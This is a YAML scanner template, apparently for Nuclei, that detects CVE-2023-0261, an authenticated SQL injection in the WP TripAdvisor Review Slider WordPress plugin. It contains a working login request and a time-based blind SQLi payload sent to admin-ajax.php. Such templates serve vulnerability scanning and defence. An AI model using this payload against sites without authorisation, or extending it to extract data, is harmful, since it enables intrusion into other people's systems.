49 lines
1.6 KiB
YAML
49 lines
1.6 KiB
YAML
id: CVE-2023-0261
|
|
|
|
info:
|
|
name: WP TripAdvisor Review Slider < 10.8 - Subscriber+ SQLi
|
|
author: theamanrawat
|
|
severity: high
|
|
description: |
|
|
The WP TripAdvisor Review Slider WordPress plugin before 10.8 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber.
|
|
remediation: Fixed in version 10.8
|
|
reference:
|
|
- https://wpscan.com/vulnerability/6a3b6752-8d72-4ab4-9d49-b722a947d2b0
|
|
- https://wordpress.org/plugins/wp-tripadvisor-review-slider/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-0261
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 8.8
|
|
cve-id: CVE-2023-0261
|
|
cwe-id: CWE-89
|
|
metadata:
|
|
verified: "true"
|
|
tags: cve2023,wordpress,wp,wp-tripadvisor-review-slider,auth,cve,sqli,wp-plugin,wpscan
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST /wp-login.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
|
|
|
- |
|
|
@timeout: 10s
|
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
content-type: application/x-www-form-urlencoded
|
|
|
|
action=parse-media-shortcode&shortcode=[wptripadvisor_usetemplate+tid="1+AND+(SELECT+42+FROM+(SELECT(SLEEP(6)))b)"]
|
|
|
|
cookie-reuse: true
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'duration_2>=6'
|
|
- 'status_code_2 == 200'
|
|
- 'contains(content_type_2, "application/json")'
|
|
- 'contains(body_2, "\"data\":{")'
|
|
condition: and
|